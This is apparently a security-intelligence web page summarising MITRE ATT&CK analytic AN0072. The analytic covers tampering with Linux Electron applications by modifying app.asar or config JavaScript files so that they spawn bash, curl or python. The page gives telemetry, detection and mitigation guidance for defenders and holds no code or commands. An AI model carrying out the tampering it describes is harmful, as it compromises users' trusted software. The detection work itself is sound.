AN0072: Analytic 0072
Abuse of Linux Electron binaries by modifying app.asar or config JS files and spawning unexpected child processes (bash, curl, python).
Analyst context for executives and security teams
This analytic is relevant because Electron-based Linux applications can become a place where tampering blends into normal user software. The supplied ATT&CK object focuses on modified app.asar or JavaScript configuration files that cause unexpected child processes such as bash, curl, or python to run. For security leaders, the decision value is whether endpoint monitoring can distinguish legitimate Electron application behavior from suspicious script or network-capable child process activity before it becomes an investigation blind spot.
Executive priority
Prioritize this as an endpoint visibility and software integrity question for Linux fleets that run Electron applications. Leaders should ask whether SOC teams can prove collection of Linux process lineage, file modification evidence for application resources, and alert triage procedures for unusual child processes from desktop applications. This supports incident readiness, audit evidence for monitoring coverage, and control prioritization around application integrity and least-privilege execution.
Technical view
For Linux systems, validate whether detections can correlate Electron application execution with modifications to app.asar or JavaScript configuration files and subsequent unexpected child processes, specifically bash, curl, or python as named in the ATT&CK description. Because the object provides no official detection logic and no tactic mapping, teams should treat AN0072 as a detection-validation prompt rather than a complete rule. SOC and IR teams should baseline normal Electron application child-process behavior, then investigate deviations with process lineage, file write history, user context, command-line arguments, and network activity where available.
Likely telemetry
- Linux process creation events with parent-child relationships
- Command-line arguments for spawned processes
- File modification events for Electron application resources such as app.asar and JavaScript configuration files
- Application execution context, including user account and executable path
- Network connection telemetry for child processes such as curl, python, or shells when collected
Detection direction
- Confirm that Linux endpoint telemetry preserves parent process, child process, command line, executable path, user, and timestamp fields.
- Baseline expected Electron application behavior before alerting solely on child processes, because some applications may legitimately launch helper processes.
- Prioritize review when Electron binaries spawn shells or scripting/network tools named in the object: bash, curl, or python.
- Correlate suspicious child process creation with recent modification of app.asar or JavaScript configuration files associated with the same application.
- Tune for local software inventory and approved Electron applications to reduce false positives.
Mitigation priorities
- Inventory Linux systems running Electron-based applications and identify where application files are user-writable or unmanaged.
- Restrict unnecessary write access to application directories and configuration locations where operationally feasible.
- Use software integrity monitoring or endpoint controls to detect unexpected changes to application resource files.
- Apply least-privilege principles so routine users and applications have only the permissions required.
- Ensure incident response playbooks include collection of modified application files, process lineage, and related network activity for suspected Electron application tampering.
Analyst notes and limits
AN0072 is a detection analytic, not a technique description. The official description is narrow: Linux Electron binaries, modification of app.asar or config JavaScript files, and unexpected child processes including bash, curl, and python. No relationships, tactic mappings, aliases, or official detection content were supplied, so the take is framed around validation priorities rather than a specific detection rule.
This assessment is limited to the supplied ATT&CK fields and external reference. It does not establish prevalence, actor use, impact, exploitability, or guaranteed detection coverage. Local application inventory, Linux endpoint logging configuration, and normal Electron application behavior are required to determine material risk and tuning requirements.
Analytic 0072
Abuse of Linux Electron binaries by modifying app.asar or config JS files and spawning unexpected child processes (bash, curl, python).
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | d2bdf31c2c82… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN0072Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.